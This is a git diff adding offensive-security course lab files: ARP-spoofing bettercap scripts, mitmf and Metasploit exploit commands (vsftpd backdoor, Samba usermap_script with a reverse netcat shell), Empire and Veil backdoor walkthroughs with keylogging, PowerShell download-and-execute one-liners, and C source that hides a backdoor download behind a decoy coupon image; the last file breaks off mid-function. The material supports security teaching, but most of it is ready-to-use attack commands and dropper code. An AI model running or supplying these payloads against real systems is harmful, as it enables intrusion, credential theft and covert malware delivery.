diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx
index e88ad25..6068336 100644
Binary files a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_ARP/Capture_Password_APR_MITM.pptx differ
diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/Capture_Password_APR_Bypass_https.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/Capture_Password_APR_Bypass_https.pptx
new file mode 100644
index 0000000..5f98645
Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/Capture_Password_APR_Bypass_https.pptx differ
diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/original.zip b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/original.zip
new file mode 100644
index 0000000..a880453
Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/original.zip differ
diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/spoof.cap b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/spoof.cap
new file mode 100644
index 0000000..e62c56f
--- /dev/null
+++ b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/spoof.cap
@@ -0,0 +1,6 @@
+net.probe on
+set arp.spoof.fullduplex true
+set arp.spoof.targets 10.0.2.13
+arp.spoof on
+set net.sniff.local true
+net.sniff on
diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_Bypass_https.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_Bypass_https.pptx
new file mode 100644
index 0000000..1366957
Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_Bypass_https.pptx differ
diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_MITM.pptx b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_MITM.pptx
new file mode 100644
index 0000000..1366957
Binary files /dev/null and b/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/02_Capture_Password_Bypass_https/~$Capture_Password_APR_MITM.pptx differ
diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/DNS_spoof_bettercap.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/DNS_spoof_bettercap.pptx
new file mode 100644
index 0000000..0e87e51
Binary files /dev/null and b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/DNS_spoof_bettercap.pptx differ
diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/spoof.cap b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/spoof.cap
new file mode 100644
index 0000000..b9fe88d
--- /dev/null
+++ b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/spoof.cap
@@ -0,0 +1,5 @@
+net.probe on
+set arp.spoof.fullduplex true
+set arp.spoof.targets 10.0.2.13
+arp.spoof on
+net.sniff on
diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_mitmf_tool_lab.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_mitmf_tool_lab.pptx
new file mode 100644
index 0000000..1366957
Binary files /dev/null and b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_mitmf_tool_lab.pptx differ
diff --git a/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_spoof_bettercap.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_spoof_bettercap.pptx
new file mode 100644
index 0000000..1366957
Binary files /dev/null and b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/01_DNS_spoof_Bettercap/~$DNS_spoof_bettercap.pptx differ
diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/DNS_mitmf_tool_lab.pptx
similarity index 100%
rename from FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/DNS_mitmf_tool_lab.pptx
rename to FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/DNS_mitmf_tool_lab.pptx
diff --git a/FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/commands.TXT b/FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/commands.TXT
similarity index 100%
rename from FSCS728_Information_Systems/05_1_Attack_Networks_MITMAttack/DNS_Poisoning/commands.TXT
rename to FSCS728_Information_Systems/05_2_Attack_Networks_MITMAttack_DNS/DNS_Poisoning_MITM/commands.TXT
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/Metasploitable_Installation_lab.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/Metasploitable_Installation_lab.pptx
new file mode 100644
index 0000000..e13ef28
Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/Metasploitable_Installation_lab.pptx differ
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/commands.TXT
new file mode 100644
index 0000000..878bc45
--- /dev/null
+++ b/FSCS728_Information_Systems/06_1_Attack_Server/1_Metasploitable2_Installation/commands.TXT
@@ -0,0 +1,3 @@
+https://information.rapid7.com/download-metasploitable-2017.html
+
+poweroff
\ No newline at end of file
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/commands.TXT
new file mode 100644
index 0000000..5ce4b59
--- /dev/null
+++ b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/commands.TXT
@@ -0,0 +1,14 @@
+arp -a //router's ip
+
+//install mitmf
+apt-get update
+apt-get install mitmf -y
+
+//attack
+mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0
+mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0 --screen
+//-hsts
+
+//Website
+http://www.stealmylogin.com/demo.html
+http://w3schools.invisionzone.com/
\ No newline at end of file
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/default_remote_shell_enabled.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/default_remote_shell_enabled.pptx
new file mode 100644
index 0000000..4bc47f0
Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/default_remote_shell_enabled.pptx differ
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/~$default_remote_shell_enabled.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/~$default_remote_shell_enabled.pptx
new file mode 100644
index 0000000..1366957
Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/2_Server_Misconfigration/~$default_remote_shell_enabled.pptx differ
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT
new file mode 100644
index 0000000..5a3b0da
--- /dev/null
+++ b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT
@@ -0,0 +1,7 @@
+use exploit/unix/ftp/vsftpd_234_backdoor
+show options
+set RHOST 10.0.2.12
+exploit
+
+iptables -I INPUT -p tcp --dport 21 --syn -j LOG --log-prefix "TCP_SYN"
+grep -i "TCP_SYN" syslog
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/ftp_backdoor.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/ftp_backdoor.pptx
new file mode 100644
index 0000000..bf0e1c2
Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/3_Server_Preexisting_backdoor/ftp_backdoor.pptx differ
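Review bot: The last line of the 3_Server_Preexisting_backdoor/commands.TXT hunk, `grep -i "TCP_SYN" syslog`, only finds the log when the shell's current directory happens to be /var/log; the detection step should name the file outright, `grep -i "TCP_SYN" /var/log/syslog`. The LOG rule on the line above it is inserted at the head of INPUT and fires for every inbound SYN to port 21, so the notes should say that legitimate FTP logins are recorded as well and that the rule is removed after the exercise with `iptables -D INPUT` and the same match. A trailing space in the prefix, `--log-prefix "TCP_SYN "`, keeps the tag from running into the `IN=` field of the kernel log line, which makes the grep output easier to read.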
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/Inject_Code_To_Server.pptx b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/Inject_Code_To_Server.pptx
new file mode 100644
index 0000000..d25be47
Binary files /dev/null and b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/Inject_Code_To_Server.pptx differ
diff --git a/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/commands.TXT b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/commands.TXT
new file mode 100644
index 0000000..359d3cd
--- /dev/null
+++ b/FSCS728_Information_Systems/06_1_Attack_Server/4_Server_code_injection_BOF/commands.TXT
@@ -0,0 +1,12 @@
+https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
+msfconsole
+use exploit/multi/samba/usermap_script
+set RHOST 10.0.2.12 //set the target IP
+set RPORT 139 //set the target port
+
+set PAYLOAD cmd/unix/reverse_netcat
+
+set LHOST 10.0.2.10 //set the attaker IP
+set LPORT 2222 //set the attaker port
+
+exploit
\ No newline at end of file
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx
new file mode 100644
index 0000000..008703c
Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/Social_Enginnering/WebTemplate/Defacing_google.pptx differ
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt
new file mode 100644
index 0000000..2b1da64
--- /dev/null
+++ b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/Empire_Framework_commands.txt
@@ -0,0 +1,42 @@
+mkdir /var/www/html/empire_backdoor/
+mkdir empire_lab
+cd empire_lab
+git clone https://github.com/EmpireProject/Empire.git
+cd Empire/setup
+./install.sh
+cd ..exit
+./empire
+
+//create a listener
+listeners
+(optional) uselistener back
+uselistener http
+(optional) info
+set Port 8081
+set Host http:://10.0.2.10:8081
+execute
+back
+list //list listener
+
+
+//create a backdoor for Windows, we need to know how to communicate with Windows Powershell securly (stager)
+back //back to top level
+//(optional): usestager
+usestager windows/launcher_bat
+set Listener http
+set OutFile /var/www/html/empire_backdoor/emipire_http_8081.bat
+execute
+
+
+Victim download the backdoor payload from the website (Window machine)
+service apache2 start (Kali start the website)
+(Window 10: open IE)
+10.0.2.7/empire_backdoor
+(click the rev_https_8080.exe and run anyway)
+
+//Access to victim's computer
+agents
+interact
+sysinfo
+
+
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx
new file mode 100644
index 0000000..914b783
Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/create_backdoor_Empire_lab.pptx differ
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip
new file mode 100644
index 0000000..a7a5641
Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_Empire/emipire_http_8081.zip differ
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt
new file mode 100644
index 0000000..bfd0dbd
--- /dev/null
+++ b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/Veil_Framework_commands.txt 
@@ -0,0 +1,110 @@
+Using veil-framework to Create a Backdoor
+
+1. Introduction
+Veil is a tool designed to generate metasploit payloads (Meterpreter) that bypass common anti-virus solutions.
+
+Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers
+and is extended over the network at runtime.
+It communicates over the stager socket and provides a comprehensive client-side Ruby API.
+It features command history, tab completion, channels, and more.
+Metepreter was originally written by skape for Metasploit 2.x,
+common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3.
+
+Msfconsole handles the incoming connection. Msfconsole is a part of Metasploit Framework
+
+Reverse http: victim acts as client. Not the attack. Backdoor connect to me (attacker) to void anti-virus detection.
+
+2. Check environment setting up. My Window IP: 10.0.2.8
+ipconfig
+
+b. in Kali (Password: toor). My Kali IP: 10.0.2.7
+ifconfig
+
+3. Install Veil in Kali. You need to open a Kail Terminator
+mkdir opt
+cd opt
+git clone https://github.com/Veil-Framework/Veil.git
+cd Veil
+cd config
+./setup.sh --force --silent (enter "y" if asks)
+(close the console)
+
+4. Attacker set payload options using Veil
+(open the console)
+cd /opt/Veil
+./Veil.py (you should see the Veil interface now)
+list (for two tools)
+use 1 (using Evasion tool)
+list (list all payloads)
+use 15 (go/meterpreter/rev_https.py)
+set LHOST 10.0.2.7 (this IP is my attack machine, I want the payload to talk to me, e.g., reverse http)
+set LPORT 8080 (http port, don't use 80, avoid anti-virus program, sometime anti-virus scans the port)
+set PROCESSORS 1 (make backdoor process 1)
+set SLEEP 6
+options (see changed parameters)
+
+5. 
Attacker uses Veil to generate backdoor payload (executable)
+generate (you should see interface)
+rev_https_8080 (backdoor name to remember easily)
+(generated file name: /usr/share/veil-output/compiled/rev_https_8080.exe)
+(optional: https://nodistribute.com/ to check if the backdoor will be detected)
+(close the console/Terminator)
+
+6. Attacker load the backdoor to website (On attacker's machine/Kali)
+(open a file folder)
+/ (allow you to type path)
+/var/www/html
+(create a folder evil-files)
+(control-N to open another file window)
+/usr/share/veil-output/compiled/ (you will see the backdoor file)
+(copy the .exe file to evil-files folder)
+(open Terminator)
+service apache2 start (start the website)
+
+7. Attacker listening incoming connection (Sever/Attacker side/Kali)
+(open another Terminator or split current Terminator)
+msfconsole (you should see interface)
+use exploit/multi/handler
+set PAYLOAD windows/meterpreter/reverse_https (I will listen to the malicouse payload/program)
+show options (see all parameters for the payload)
+set LHOST 10.0.2.7 (this IP is my attack machine, I am waiting, e.g., reverse http)
+set LPORT 8080 (http port, don't use 80, the same setting)
+show options (see all parameters for the payload)
+exploit (Now attacker is listening)
+
+8. Victim download the backdoor payload from the website (Window machine)
+(open IE)
+10.0.2.7/evil-files
+(click the rev_https_8080.exe and run anyway)
+
+9. Access to victim’s machine
+(enter, you will see msg promote again)
+sessions -i
+sessions -i 1
+sysinfo
+ps
+keyscan_start (enable key logger)
+(in Window VM, open facebook, type your password)
+keyscan_dump (what did you see?)
+keyscan_stop
+screenshot (what did you see)
+(you will see victim connects to the attacker)
+(restore snapshot)
+
+
+
+
+
+
+
+
+
+
+
+Reference
+https://www.udemy.com/learn-social-engineering-from-scratch/
+https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/
+https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
+https://www.youtube.com/watch?v=W1rCVyGwKQ4
+
+
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx
new file mode 100644
index 0000000..4e46cb7
Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/create_backdoor_Veil_lab.pptx differ
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/rev_https_8080.zip b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/rev_https_8080.zip
new file mode 100644
index 0000000..178bfae
Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/create_backdoor_veil/rev_https_8080.zip differ
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx
new file mode 100644
index 0000000..7a34029
Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image - old_not working.pptx differ
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx
new file mode 100644
index 0000000..a9711bb
Binary files /dev/null and b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/backdoor_in_image.pptx differ
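Review bot: The step `(in Window VM, open facebook, type your password)` in section 9 of Veil_Framework_commands.txt has students enter a real credential into a VM that is being keylogged by the `keyscan_start` line just above it; the notes should direct them to a disposable account instead, e.g. `(in Window VM, log into a throwaway test account with a dummy password)`. The same hunk records the Kali login in clear text on the line `b. in Kali (Password: toor)`; if the lab image keeps the distribution default, say so there, otherwise the password does not belong in the repository. The only cleanup is the single line `(restore snapshot)`; it would help to state that the snapshot must have been taken before the download in step 8, so that rev_https_8080.exe does not survive in the Windows VM after the exercise.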
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/commands.TXT b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/commands.TXT
new file mode 100644
index 0000000..457b42a
--- /dev/null
+++ b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/commands.TXT
@@ -0,0 +1,77 @@
+https://www.dropbox.com/s/snby65gmwh92esj/amazon_coupon_code_Vl8_icon.ico
+https://www.dropbox.com/s/gxh0ickzpr34t4o/amazon-coupon-code.jpg
+https://www.dropbox.com/s/b01iqpmb9vfslrp/autoit-download-and-execute.au3
+https://www.dropbox.com/s/03cvti4wgu0dx0l/rev_https_8080.zip
+
+ls /root/.set/reports/powershell/
+mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
+
+mv evil.exe /var/www/html/backdoor_image
+
+use multi/handler
+set PAYLOAD windows/meterpreter/reverse_https
+set LHOST 10.0.2.10
+set LPORT 8080
+exploit
+
+
+
+
+
+
+
+
+
+
+Other useful commands
+
+powershell (new-object System.Net.WebClient).DownloadFile('http://www.xys.org/buttons/xys_cover.gif','C:\Users\IEUser\cover.gif')
+
+https://www.linkedin.com/pulse/go-hell-powershell-powerdown-attacks-kirtar-oza-cissp-cisa-ms-/
+
+https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf
+
+ powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\"
+
+"powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))\""
+
+powershell.exe "IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))"
+
+gcc evil_image.c -o evil_image.exe
+
+
+char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe";
+
+#include
+#include
+#include
+int main()
+{
+char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe";
+char url[200]="";
+char shellCMD[400]="";
+printf("URL of a backdoor: ");
+//gets(str);
+
+strcat(url,"'");
+strcat(url,str);
+strcat(url,"'");
+
+printf(url);
+printf("\n");
+
+char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(";
+strcat(shellCMD,shellCMD_head);
+strcat(shellCMD,url);
+strcat(shellCMD,",\'C:\\Users\\Public\\screenshot.exe\')");
+
+printf(shellCMD);
+getchar();
+
+
+//system("powershell.exe \"IEX( (new-object 
net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\"");
+//system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(url, 'C:\\Users\\Public\\screenshot.exe') ");
+system(shellCMD);
+system("powershell.exe start C:\\Users\\Public\\screenshot.exe");
+return 0;
+}
\ No newline at end of file
diff --git a/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/evil.c b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/evil.c
new file mode 100644
index 0000000..60449c8
--- /dev/null
+++ b/FSCS728_Information_Systems/07_1_Attack_Client/hide_backdoor_in_image/evil.c
@@ -0,0 +1,101 @@
+#include
+#include
+#include
+
+/*
+system("powershell.exe \"IEX( (new-object net.webclient).downloadstring
+('http://10.0.2.10/payload.txt'))\"");
+system("powershell.exe -w hidden -c (new-object System.Net.WebClient).
+Downloadfile('http://10.0.2.10/payload.txt', 'C:\\Users\\Public\\screenshot.exe') ");
+system("powershell.exe start C:\\Users\\Public\\backdoor.exe");
+system("powershell.exe start C:\\Users\\Public\\coupon.jpg");
+*/
+
+void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc);
+void powershellcmdRun(char * shellCMDRun, char * outputLoc);
+char* insert_char_realloc (char *str, int len);
+
+int main()
+{
+
+
+//You need to make changes here
+char url_evil[200]="http://10.0.2.10/rev_https_8080.exe";
+char url_image[200]="http://10.0.2.10/amazon-coupon-code.jpg";
+//char url_evil[200]="https://pbs.twimg.com/profile_images/1057899591708753921/PSpUS-Hp_400x400.jpg"; //for test
+//char url_image[200]="https://pbs.twimg.com/profile_images/54789364/JPG-logo-highres_400x400.jpg"; //for testing
+char backdoorLoc[200]="C:\\Users\\Public\\backdoor.exe";
+char outputLoc_image[200]="C:\\Users\\Public\\coupon.jpg";
+
+
+
+// ==================download backdoor
+char shellCMD[400]="";
+powershellDownloadCmd(url_evil, shellCMD, backdoorLoc);
+//printf("URL: %s\n", shellCMD);
+system(shellCMD);
+
+//================== download image
+char shellCMD_image[400]="";
+powershellDownloadCmd(url_image, shellCMD_image, outputLoc_image);
+//printf("URL: %s\n", shellCMD_image);
+system(shellCMD_image);
+
+//=============execute backdoor
+char shellCMDRun[400]="";
+powershellcmdRun(shellCMDRun, insert_char_realloc (backdoorLoc, strlen(backdoorLoc)));
+//printf("command: %s\n", shellCMDRun);
+system(shellCMDRun);
+
+//=============open an image
+char shellCMDRun_image[400]="";
+powershellcmdRun(shellCMDRun_image, insert_char_realloc (outputLoc_image, strlen(outputLoc_image)));
+//printf("command: %s\n", shellCMDRun_image);
+system(shellCMDRun_image);
+
+return 0;
+}
+
+/* function returning a powershell command */
+void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc){
+ char url_with_quote[200]="";
+ strcat(url_with_quote,"'");
+ strcat(url_with_quote,url);
+ strcat(url_with_quote,"'");
+
+ char loc_with_quote[200]="";
+ strcat(loc_with_quote,",\'");
+ strcat(loc_with_quote,outputLoc);
+ strcat(loc_with_quote,"\')");
+
+
+ char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(";
+ strcat(shellCMD,shellCMD_head);
+ strcat(shellCMD,url_with_quote);
+ strcat(shellCMD,loc_with_quote);
+}
+
+
+void powershellcmdRun(char * shellCMDRun, char * outputLoc){
+ char shellCMD_head[400]="\"powershell.exe start ";
+ strcat(shellCMDRun,shellCMD_head);
+ strcat(shellCMDRun,outputLoc);
+ strcat(shellCMDRun,"\"");
+}
+
+char* insert_char_realloc (char *str, int len){
+int i;
+int j=0;
+char * str_temp = (char *)malloc(len + 10);
+for (i=0;i